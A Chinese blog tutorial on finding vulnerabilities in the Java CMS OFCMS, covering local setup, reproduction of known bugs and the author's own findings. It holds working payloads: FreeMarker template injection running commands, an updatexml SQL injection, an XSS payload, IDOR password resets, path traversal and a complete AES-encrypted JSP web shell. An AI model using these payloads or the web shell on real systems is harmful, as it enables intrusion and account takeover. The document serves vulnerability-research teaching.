細說從0開始挖掘CMS

前言

挖了一些phpcms的漏洞了,突然想嘗試去挖一下javacms的漏洞,於是寫下這篇文章來記錄一下自己挖洞的一個流程,希望能幫助到一些正在學習挖洞的師傅們。

確立目標

挖洞的第一步首先是確立一個目標,也就是找個cms來挖,這裏可以通過githubgitee或者谷歌百度直接去搜cms

image-20220810224523169.png

image-20220810224805721.png

如果挖洞經驗比較少的話建議找一下star少的cms去挖,找到相應的項目,然後點進去,下載源碼,然後看項目的介紹,大致瞭解一下項目的信息和安裝的過程。

image-20220810224838825.png

信息收集

如果確定了目標,接下來我們可以去了解一下他的項目信息,相應的漏洞等。

項目信息除了上面的README以爲還可以看看issues模塊,這裏可能會有一些系統問題或者安裝問題,後續我們可能會遇到

image-20220810225040550.png

漏洞信息的話可以通過cnvd或者其他漏洞平臺(直接百度也可以)去查看該系統的漏洞情況。

image-20220810225217393.png

或者cnvd查看相應的信息,通過查看相應的信息可以提高我們挖洞的效率,我們從中可以知道該項目已經存在漏洞,我們到時候挖就可以看看相應的地方會不會還存在漏洞或者避免挖到別人挖過的漏洞。

image-20220812102617971.png

環境搭建

上面的信息收集完之後我們就要開始搭建環境了,搭建環境是很關鍵的一步,由於某些cms安裝過程繁瑣或者沒寫好說明,會導致安裝出現很多問題甚至裝不上,這裏我們要注意項目的文檔,如果實在安裝有問題可以通過相關渠道去聯繫一下作者或者相應的qq羣尋求一下幫助。

【----幫助網安學習,以下所有學習資料免費領!加vx:yj009991,備註 “博客園” 獲取!】

 ① 網安學習成長路徑思維導圖
 ② 60+網安經典常用工具包
 ③ 100+SRC漏洞分析報告
 ④ 150+網安攻防實戰技術電子書
 ⑤ 最權威CISSP 認證考試指南+題庫
 ⑥ 超1800頁CTF實戰技巧手冊
 ⑦ 最新網安大廠面試題合集(含答案)
 ⑧ APP客戶端安全檢測指南(安卓+IOS)

本次挖掘的漏洞是ofcms,首先先下載一下源碼,然後解壓丟一邊,回到網頁來看一下項目文檔。

環境要求

一般項目都會有寫環境要求的,我們調整一下就好。

image-20220810230452849.png

環境準備

環境解壓完我們用idea打開,如果發現一些重要目錄文件不見了,重開一下就有了。

數據庫

首先找到db.properties,如果不能一眼看到可以通過ctrl+shift+f來快速搜索

image-20220810231627267.png

/ofcms-admin/src/main/resources/dev/conf/db.properties

  

找到了文件,訪問相對應的路徑即可,這裏我們修改一下數據庫用戶名和密碼,然後點擊右邊的數據庫來測試連接。

image-20220810231916114.png

然後按數據庫信息來修改,然後點擊右邊的數據庫,配置一下。

如果出現以下的錯誤
Server returns invalid timezone. Go to 'Advanced' tab and set 'serverTimezone' property manually.

image-20220810232119153.png

這是時區問題,如果配置了環境變量報錯,可以通過以下步驟來解決。

win+R
cmd
mysql -hlocalhost -uroot -p
(然後輸入數據庫密碼)
show variables like'%time_zone';
set global time_zone = '+8:00';

  

image-20220810232218984.png

沒配置環境變量的,看這個文章

https://blog.csdn.net/liuqiker/article/details/102455077

配置成功效果圖如下

image-20220810232240811.png

maven

右鍵項目找到mavne重新加載項目即可

image-20220811202648083.png

tomcat

在run-configuration中配置tomcat

image-20220811210318285.png

Deployment配置一下

image-20220811210824819.png

一切配置好後點擊run啓動就可以了,如果遇到端口報錯改一下端口,其他的報錯就百度一下。

安裝過程

這一步就比較簡單了,跟着弄就好了。

image-20220810234056764.png

下一步,然後配置好數據庫,這裏記得先在數據庫中新建個ofcms的庫,否則會報Unknown database 'ofcms'的錯。

image-20220810234239607.png

在這裏,正常安裝步驟是建立好數據庫,輸入賬號密碼就等待安裝就好。

如果出現以下報錯,我們可以通過手工導入數據庫,這一種情況在安裝別的cms也很常見,在安裝遇到數據庫問題我們可以直接導入數據庫。

 You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'DROP TABLE IF EXISTS `of_cms_access`; CREATE TABLE `of_cms_access` ( `access_i' at line 21 

數據庫位置ofcms-master\doc\sql,選擇相應的版本直接拖進navicat中,然後導入成功後刷新一下就好。

image-20220811203610702.png

接着將數據庫配置文件db-config.properties文件名修改爲db.properties,重啓一下服務。

image-20220811212418610.png

漏洞復現

環境搭建完,我們就可以開始挖洞了,然後在這裏我建議是能找到該漏洞已存在的文章,我們就先去復現一下,看看別的師傅們的挖過的漏洞,一方面是防止重複,一方面是可以學習一下別人的挖洞思路。

ofcms其實存在挺多漏洞的,這裏我們就來簡單復現一下,大致看看師傅們的挖洞思路。

任意文件寫入

漏洞模板文件這個位置,漏洞的詳細分析可以看看文章

漏洞復現

我們選擇任意一個html,然後點擊保存抓包,我們可以看到包的信息。

image-20220812142624926.png

這裏就是寫入文件,我們在admin目錄下寫入eek1.xml文件。

image-20220812143543139.png

通過上面任意文件讀取漏洞去讀取一下

image-20220812143617279.png

模板注入漏洞

漏洞在模板注入,這個漏洞主要是pom.xml引入了freemarker-2.3.21依賴,但是留下一些不安全因素導致的,具體漏洞分析可以看這篇文章

漏洞復現

漏洞復現過程比較簡單,我們直接在html文件中插入payload就可以了

<#assign ex="freemarker.template.utility.Execute"?new()> ${ ex("calc") }

  

插入後直要訪問前臺就會出發payload

image-20220811214421076.png

模板注入的知識點可以看看這篇文章

通過這一個洞,我們可以挖洞的時候可以去注意一下pom.xml引入的模板。

SQL注入漏洞

漏洞分析參考文章,由於這裏的預編譯處理不起作用,所以可以執行SQL語句。

漏洞復現

漏洞點在系統設置---代碼生成---添加----添加表,在這裏抓一下包

image-20220812144231426.png

直接把payload輸進來

update of_cms_ad set ad_id=updatexml(1,concat(1,user()),1)

image-20220812144328508.png

任意文件上傳

漏洞分析在上一篇文章裏有說,這裏主要就是利用windows或中間件文件上傳特性來避免結尾爲jspjspx

漏洞復現

找到一個上傳點然後抓包,我這裏是在內容管理----欄目管理----新增----新增用戶----上傳附件這裏抓包的。

image-20220812145141251.png

eek.jsp
<%@page import="java.util.*,javax.crypto.*,javax.crypto.spec.*"%><%!class U extends ClassLoader{U(ClassLoader c){super(c);}public Class g(byte []b){return super.defineClass(b,0,b.length);}}%><%if(request.getParameter("pass")!=null){String k=(""+UUID.randomUUID()).replace("-","").substring(16);session.putValue("u",k);out.print(k);return;}Cipher c=Cipher.getInstance("AES");c.init(2,new SecretKeySpec((session.getValue("u")+"").getBytes(),"AES"));new U(this.getClass().getClassLoader()).g(c.doFinal(new sun.misc.BASE64Decoder().decodeBuffer(request.getReader().readLine()))).newInstance().equals(pageContext);%>

 

image-20220812150004902.png

可以看到文件上傳進去,而且內容沒被修改。

漏洞挖掘

通過上面的內容,我們學習了別的師傅的挖洞思路,接下來就是我自己的挖洞過程了,下面是我挖的幾個洞。

image-20220812150434742.png

首先除了已經存在的漏洞外,我們要大致知道什麼漏洞會存在什麼地方,例如登錄註冊界面會出現sql漏洞,邏輯漏洞等,留言框可能會出現xss漏洞,上傳頭像界面可能會出現任意文件上傳漏洞等,信息泄露漏洞也可以通過御劍或者其他工具去掃一下。

XSS漏洞

漏洞復現

對於前臺有個客戶案例,選擇其中一個案例,然後有個留言框,這裏直接打入xss的payload就可以了。

<video src=x onerror=alert("eek") />

 

image-20220812150828600.png

漏洞分析

文件位置ofcms-master\ofcms-api\src\main\java\com\ofsoft\cms\api\v1

package com.ofsoft.cms.api.v1;
​
import com.jfinal.plugin.activerecord.Db;
import com.ofsoft.cms.api.ApiBase;
import com.ofsoft.cms.core.annotation.Action;
import com.ofsoft.cms.core.api.ApiMapping;
import com.ofsoft.cms.core.api.RequestMethod;
import com.ofsoft.cms.core.api.check.ParamsCheck;
import com.ofsoft.cms.core.api.check.ParamsCheckType;
import com.ofsoft.cms.core.utils.IpKit;
import java.util.Map;
​
​
/**
 * 評論接口
 *
 * @author OF
 * @date 2019年2月24日
 */
@Action(path = "/comment")
public class CommentApi extends ApiBase {
    /**
     * 獲取內容信息
     */
    @ApiMapping(method = RequestMethod.GET)
    @ParamsCheck(
            {@ParamsCheckType(name = "comment_content"), @ParamsCheckType(name = "content_id"),
                    @ParamsCheckType(name = "site_id")})
    public void save() {
        try {
            Map params = getParamsMap();
            params.put("comment_ip", IpKit.getRealIp(getRequest()));
            Db.update(Db.getSqlPara("cms.comment.save", params));
            rendSuccessJson();
        } catch (Exception e) {
            e.printStackTrace();
            rendFailedJson();
        }
    }
}

請求/api/v1/comment/save.json?comment_content=123&content_id=61&site_id=1&check_status=1&_=1644130926694

這裏直接接受請求,未對content的內容進行檢測,直接將請求的值存入數據庫中,導致存在跨站腳本漏洞。

邏輯缺陷漏洞1

本地環境

現有兩個用戶信息,系統管理員admin和普通管理員eek,如下是系統管理員的界面。

admin/admin
eek/123

image-20220812151227116.png

超級管理員後臺界面。

image-20220812151237539.png

普通管理員後臺界面

image-20220812151244717.png

漏洞復現

我們先以普通管理員登錄

image-20220812151322941.png

點擊右上角,修改密碼

image-20220812151332861.png

在此處burp抓包

image-20220812151532874.png

修改id爲1,密碼任意

修改前admin的密碼是admin

修改後爲admin,密碼是eek

image-20220812151636497.png

漏洞分析

漏洞文件:\ofcms-master\ofcms-admin\src\main\java\com\ofsoft\cms\admin\controller\system\SysUserController.javarespwd方法

...    
public void respwd() {
        Map<String, Object> params = getParamsMap();
        String password = (String) params.get("password");
        String newpassword = (String) params.get("newpassword");
        if (!password.equals(newpassword)) {
            rendFailedJson("兩次密碼不一致!");
            return;
        }
        Record record = new Record();
        if (!StringUtils.isBlank(password)) {
            password = new Sha256Hash(password).toHex();
            record.set("user_password", password);
        }
        record.set("user_id", params.get("user_id"));
        try {
            Db.update(AdminConst.TABLE_OF_SYS_USER, "user_id", record);
            rendSuccessJson();
        } catch (Exception e) {
            e.printStackTrace();
            rendFailedJson(ErrorCode.get("9999"));
        }
    }...

在此方法中,後臺對前端界面的id和兩次密碼值進行獲取,然後傳入後端,後端直接將id和密碼傳入數據庫中,讓數據庫直接更新信息。

這裏由於id可控導致用戶可以直接修改任意id的密碼,導致該地方存在任意用戶密碼重置。

邏輯缺陷漏洞2

本地環境

數據庫信息如下圖所示

image-20220812152802265.png

現在有超級管理員,admin/123

普通管理員,eek/123

漏洞復現

首先以普通管理員身份登錄,然後點擊右上角,基本資料

image-20220812152835568.png

在此處burp抓包

image-20220812152841375.png

image-20220812152843768.png

修改信息,user_id改爲1,密碼修改爲admin

image-20220812152850822.png

以系統管理員身份登錄

image-20220812152858427.png

成功登錄

image-20220812152904325.png

漏洞分析

漏洞文件:\ofcms-master\ofcms-admin\src\main\java\com\ofsoft\cms\admin\controller\system\SysUserController.javaupdate方法

...    
public void update() {
        Map<String, Object> params = getParamsMap();
        String password = (String) params.get("password");
        if (!StringUtils.isBlank(password)) {
            password = new Sha256Hash(password).toHex();
            params.put("user_password", password);
        }
        params.remove("password");
​
        String roleId = (String) params.get("role_id");
        if (!StringUtils.isBlank(roleId)) {
            SqlPara sql = Db.getSqlPara("system.user.role_update", params);
            Db.update(sql);
        }
        params.remove("role_id");
​
        Record record = new Record();
        record.setColumns(params);
        try {
            Db.update(AdminConst.TABLE_OF_SYS_USER, "user_id", record);
            rendSuccessJson();
        } catch (Exception e) {
            e.printStackTrace();
            rendFailedJson(ErrorCode.get("9999"));
        }
}
...

在此方法中,後臺管理直接將新增的數據放到數據庫中,直接對數據庫內容進行更新,未對不合法內容進行檢測,導致該地方存在任意用戶信息重置。

任意文件讀取

漏洞復現

找到模板文件

image-20220811213339266.png

所對應的路徑是\ofcms-master\ofcms-admin\src\main\webapp\WEB-INF\page\default,這裏可以通過目錄穿越來讀取任意文件。

在他的上兩級有個web.xml文件,我們嘗試讀取一些。

image-20220811213412917.png

這裏不能直接編輯,burp抓個包。

web.xml文件如下所示

<!DOCTYPE web-app PUBLIC
        "-//Sun Microsystems, Inc.//DTD Web Application 2.3//EN"
        "http://td/web-app_2_3.dtd" ><web-app>
    <display-name>Archetype Created Web Application</display-name>
    <listener>
        <listener-class>org.apache.shiro.web.env.EnvironmentLoaderListener</listener-class>
    </listener>
    <filter>
        <filter-name>shiro</filter-name>
        <filter-class>org.apache.shiro.web.servlet.ShiroFilter</filter-class>
    </filter>
    .........

讀取成功

image-20220811213905619.png

漏洞分析

漏洞文件位置:ofcms-master\ofcms-admin\src\main\java\com\ofsoft\cms\admin\controller\cms\TemplateController.java漏洞位於該模塊的getTemplates方法中

package com.ofsoft.cms.admin.controller.cms;
​
...
    public void getTemplates() {
        //當前目錄
        String dirName = getPara("dir","");
        //上級目錄
        String upDirName = getPara("up_dir","/");
        //類型區分
            String resPath = getPara("res_path");
        //文件目錄
        String dir = null;
        if(!"/".equals(upDirName)){
              dir = upDirName+dirName;
        }else{
              dir = dirName;
        }
        File pathFile = null;
        if("res".equals(resPath)){
            pathFile = new File(SystemUtile.getSiteTemplateResourcePath(),dir);
        }else {
            pathFile = new File(SystemUtile.getSiteTemplatePath(),dir);
        }
​
        File[] dirs = pathFile.listFiles(new FileFilter() {
            @Override
            public boolean accept(File file) {
                return file.isDirectory();
            }
        });
        if(StringUtils.isBlank (dirName)){
            upDirName = upDirName.substring(upDirName.indexOf("/"),upDirName.lastIndexOf("/"));
        }
        setAttr("up_dir_name",upDirName);
        setAttr("up_dir","".equals(dir)?"/":dir);
        setAttr("dir_name",dirName.equals("")?SystemUtile.getSiteTemplatePathName():dirName);
        setAttr("dirs", dirs);
        /*if (dirName != null) {
            pathFile = new File(pathFile, dirName);
        }*/
        File[] files = pathFile.listFiles(new FileFilter() {
            @Override
            public boolean accept(File file) {
                return !file.isDirectory() && (file.getName().endsWith(".html") || file.getName().endsWith(".xml")
                        || file.getName().endsWith(".css") || file.getName().endsWith(".js"));
            }
        });
        setAttr("files", files);
        String fileName = getPara("file_name", "index.html");
        File editFile = null;
        if (fileName != null && files != null && files.length > 0) {
            for (File f : files) {
                if (fileName.equals(f.getName())) {
                    editFile = f;
                    break;
                }
            }
            if (editFile == null) {
                editFile = files[0];
                fileName = editFile.getName();
            }
        }
​
        setAttr("file_name", fileName);
        if (editFile != null) {
            String fileContent = FileUtils.readString(editFile);
            if (fileContent != null) {
                fileContent = fileContent.replace("<", "&lt;").replace(">", "&gt;");
                setAttr("file_content", fileContent);
                setAttr("file_path", editFile);
            }
        }
        if("res".equals(resPath)) {
            render("/admin/cms/template/resource.html");
        }else{
        render("/admin/cms/template/index.html");
        }
    }
......

 

這裏沒有對dir和dir_name的值進行不合法輸入檢測,導致這裏可以進行目錄穿越,然後後面的就只有對文件是否存在進行判斷,若存在則讀取。所以此處存在任意文件讀取漏洞。

聲明:本文僅限於技術討論與分享,嚴禁用於非法途徑。若讀者因此作出任何危害網絡安全行爲後果自負,與本號及原作者無關。

更多靶場實驗練習、網安學習資料,請點擊這裏>>

 

發表評論
所有評論
還沒有人評論,想成為第一個評論的人麼? 請在上方評論欄輸入並且點擊發布.
相關文章